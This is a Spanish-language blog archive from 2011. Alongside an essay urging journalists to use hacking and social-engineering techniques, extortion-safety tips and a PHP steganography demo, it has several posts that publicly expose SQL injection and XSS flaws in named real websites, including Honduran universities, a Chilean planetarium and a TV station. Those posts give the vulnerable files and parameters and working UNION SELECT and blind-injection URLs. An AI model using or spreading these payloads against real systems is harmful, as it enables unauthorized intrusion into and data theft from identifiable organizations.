lunes, 29 de agosto de 2011

Hackear para informar (Periodistas "Hackers")

Al ver el título de este post, muchos pensarán que estoy desubicado, pero la realidad es que todo comienza con la definición que cada quien tiene de alguien que es hacker. En mi opinión un Hacker es aquel que tiene un problema o desea conseguir información y busca la manera de cómo solucionarlo o de cómo encontrar lo que busca tomándose su tiempo para aprender nuevas técnicas, actualizarse en los temas afines, Es alguien que tal vez motivado por la curiosidad o el deseo de lograr lo que nadie ha logrado, alguien al que le gusta documentarse y llegar a obtener los resultados que desea utilizando el ingenio, técnicas inventadas por el mismo o aprendidas por su experiencia, está es la definición que viene al caso, pueden haber muchas más .

Con esto como base, son pocos los periodistas que hacen un verdadero trabajo de investigación, para que los medios de comunicación den un giro y en realidad nos muestren noticias donde le quiten la máscara a corruptos y nos sorprendan con trabajos de calidad necesitamos que las personas no se comprometan con el lugar donde trabajan sino con el pueblo que informan.

El problema es que los medios de comunicación grandes son movidos por intereses y eso limita la "libertad de expresión", pero porque depender de un medio de comunicación grande?, existiendo ahora blogs y redes sociales?, en nuestros paises de L.A entiendo lo peligroso que es hacer este tipos de trabajos pero si tienen pruebas, documentación que los respalde, porque no hacerlos públicos en un blog en donde la gente sepa que cada semana encontrará información revelada sobre los que gobiernan, no solo chismes e información que sale hasta en la sopa.

Por eso digo que los periodistas hoy en día deben de hacerlas de hackers, perfeccionar sus técnicas de ingeniería social para la obtención de datos e información, saber cómo hacer mejores búsquedas en google utilizando dorks al menos, hacer uso de el cache de google cuando se topen con sitios que ya no "existen" seguramente en google aún existen, con herramientas de tecnología que quizás nunca se les cruzo por la mente que les podrían servir para su trabajo, echen a volar su imaginación.

Y si hay periodistas dispuestos a hacerlo se pueden contactar conmigo les podría dar algunos tips para comenzar al menos, y mejor mantenerse en el anonimato porque entiendo que tienen familias y en estos dorados tiempos las balas tienen más valor que la vida misma.

La información esta ahí, solo es de saber como y donde buscar.

miércoles, 24 de agosto de 2011

[hack] - XSS y iSQL en sitio de GBM

Está vez este nuevo invitado, ademas de un problema de inyección de SQL , es vulnerable a XSS

Aquí la url que demuestra por medio de un alert() el XSS:
http://bit.ly/nKtM3V

En otro ejemplo inyectando html a la web en donde se muestran los campos de nombre y direccion en la web:
http://bit.ly/oM6s9X


Y la parte de la inyección de SQL esta por acá en el archivo: contenido.php en el parametro:curso y la obtención se hace a ciegas.

Hasta la PROXYma.


Sin más detalles para evitar el abuso de Script kiddies.

[hack] - iSQL sitio de Grupo Laeisz

Vulnerabilidad de inyección de SQL

Archivo Vulnerable                   Campo vulnerable
home.php                                    idpai
 
Detalles:  Con solo inyectar ' en la url mencionada y se obtiene el error.
 
Ejemplo: 
http://www.grupolaeisz.com/home.php?idpai=2%27 

http://www.grupolaeisz.com/home.php?idpai=2%20union%20select%201,2,database%28%29,4--

Sin más detalles para evitar el abuso de Script kiddies.

[Seguridad Personal ]¿Qué hacer en una situación de extorsión?




La víctima suele proporcionar datos personales, en llamadas realizadas con semanas de anticipación a la llamada de extorsión. En esas llamadas previas, se presentan como encuestadores, empleados de bancos o aseguradoras y procuran hacer que la víctima crea que la información que se le solicita es necesaria y urgente.

A continuación algunos consejo:

- Serénese, actúe con la razón y evite reaccionar emotivamente.
-Pídele tiempo y úsalo para localizar a tu ser querido.
-Una vez que hayas localizado a tu familiar, descuelga el teléfono al menos un par de horas.
- No proporcione ningún tipo de información tanto personal como de familiares.
- Identifique a la persona que se está comunicando con usted y pídale un número telefónico para comunicarse con él.
- Pida le proporcionen lugar exacto donde se encuentra su familiar.
- Localice o comuníquese con su familia asegúrese que se encuentra bien y verifique los datos que le proporcionaron.
- Reflexione, si alguien piensa hacerte daño lo menos que va a hacer es ponerlo en alerta con un aviso o amenaza.
- Bajo ninguna circunstancia acceda a efectuar pago alguno.
- En lo posible, no entregar información (horarios, hobbies, fechas, datos personales, etc.) a gente que no sea de confianza.
- No responder encuestas telefónicas que impliquen entrega de datos personales, aunque el que llame se identifique.(
Instruye a tu familia y al personal de servicios que sean muy discretos.)
- Si la llamada llega desde alguna cárcel del Servicio Penitenciario (una grabación lo anuncia), cortar de inmediato.
- Cortar cuando los supuestos secuestradores dicen que tienen cautivo a alguien de la familia e insisten con que uno no corte.

-Mantén una comunicación constante con tu familia. Hazles saber en dónde estás, con quién y a qué hora.
-Duda si te informan que ganaste un premio. Si no has recibido notificación alguna vía correo, verifícalo directamente con el proveedor en cuestión y no proporciones información personal o datos de tus tarjetas de crédito.
-Si en cuanto contesta le preguntan “¿Con quién hablo?”, responda siempre: “¿Con quién quiere hablar?”.
- Cuando el edificio tiene un buzón común, tratar de no dejar mucho tiempo la correspondencia.
- Si los supuestos secuestradores piden el código de una tarjeta telefónica como pago, no tirar ni romper la tarjeta. A partir de ella, los investigadores podrán rastrear a quien lo utiliza y llegar al autor del llamado.

[hack] - iSQL sitio de Planetario de Universidad de Santiago de Chile

Vulnerabilidad de inyección de SQL

Archivo Vulnerable                   Campo vulnerable
actividades.php                            idNoticia
 
Detalles:  Con solo inyectar ' en la url mencionada y se obtiene el error.
 
Ejemplo: 

http://www.planetariochile.cl/actividades.php?idNoticia=102+and+1=0+union+select+all+1,2,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,4,5,6,7,8,9,10,11,12,13

Sin más detalles para evitar el abuso de Script kiddies.

sábado, 13 de agosto de 2011

martes, 9 de agosto de 2011

[hack] - iSQL sitio de Televicentro

 Vulnerabilidad de inyección de SQL

Archivo Vulnerable                   Campo vulnerable
tvconline_noticia-detalle.php        noticia_id
 
Detalles:  Con solo inyectar ' en la url mencionada y se obtiene el error.
 
Ejemplo: 
Version de Mysql:
http://televicentro.hn/new/tvconline_noticia-detalle.php?noticia_id=23814+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,version%28%29,20,21,22,23,24--


 Sin más detalles para evitar el abuso de Script kiddies.

viernes, 5 de agosto de 2011

[Esteganos] Algo de esteganografía con php

Esta vez, estube realizando algunas pruebas de esteganografía con php.

La esteganografía es la disciplina en la que se estudian y aplican técnicas que permiten el ocultamiento de mensajes u objetos, dentro de otros, llamados portadores, de modo que no se perciba su existencia.

El método mas utilizado para esta técnica es Inserción en el bit menos significativo (Least Significant Bit Insertion)

Utilice una clase en php creada por @irontec la cual permite guardar texto en JSON cifrado en AES. dentro de una imagen, vale destacar que el texto guardado en la imagen estara en binario.

La clase la pueden descargar de aquí

Ahora un ejemplo de la implementación:

<?php

include("ImgJson.php");
$img = new ImgJson('source.jpg'); //Imagen en donde vamos a ocultar el msj
$img->createDestiny('destiny.png',
  array('titulo' => 'Titulo del mensaje',
'mensaje' => 'Mensaje que enviaremos'),
   'assedexr'); //Password que le pondremos al mensaje
/* Hasta aqui ya ha sido creada la imagen destiny.png 
con el texto agregado */
?>

 Para poder acceder al texto de la imagen lo podemos hacer de la siguiente manera

<?php
include("ImgJson.php");
$img = new ImgJson(destiny.png); 

$img->imgOrigin('destiny.png');
$json = $img->getJSON('assedexr'); //aqui va el password que pusimos anteriormente
var_dump($json);//Una manera de ver el contenido
 
//Y con este metodo accedemos directamente a las variables del arreglo.
echo "Titulo:".$json->titulo." Mensaje".$json->mensaje;

?>


Sencillo no?.. aca pueden ver con lujo de detalle y una buena explicación el funcionamiento de la clase utilizada. http://code.irontec.com/

Y mi implementacion online del script aquí: http://h4ckhn.webege.com/estegano.php

Hasta la PROXYma.

miércoles, 3 de agosto de 2011

[hack] iSQL sitio de la Universidad Autonoma de Honduras UNAH

Vulnerabilidad de inyección de SQL
 
Archivo Vulnerable  Campo vulnerable 
index_r.php         cat
 
Detalles: 
 
-->Muestra correctamente la web  
https://www.unah.edu.hn/index_r.php?art=1543%20AND%201=1 

-->Muestra una pagina en blanco
https://www.unah.edu.hn/index_r.php?art=1543%20AND%201=0 
 
Y aunque no muestra ningun error es vulnerable a la inyección.  
 
Una de las soluciones podria ser modificar las variables 
que se envian por URL con un script que evite la inserción 
de codigo o caracteres maliciosos que se incluya en todas las paginas. 

 
Sin más detalles para evitar el abuso de Script kiddies.

lunes, 1 de agosto de 2011

[hack] - iSQL sitio de la Universidad Privada de San Pedro Sula (USPS)

Vulnerabilidad de inyección de SQL

Archivo Vulnerable  Campo vulnerable 
noticias2.php       arcmonth 
 
Detalles:  Con solo inyectar ' en la url mencionada y se obtiene el error.
 
Ejemplo: 
Version de Mysql:
http://bit.ly/qLumag
 
 Sin más detalles para evitar el abuso de Script kiddies.

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Best Web Host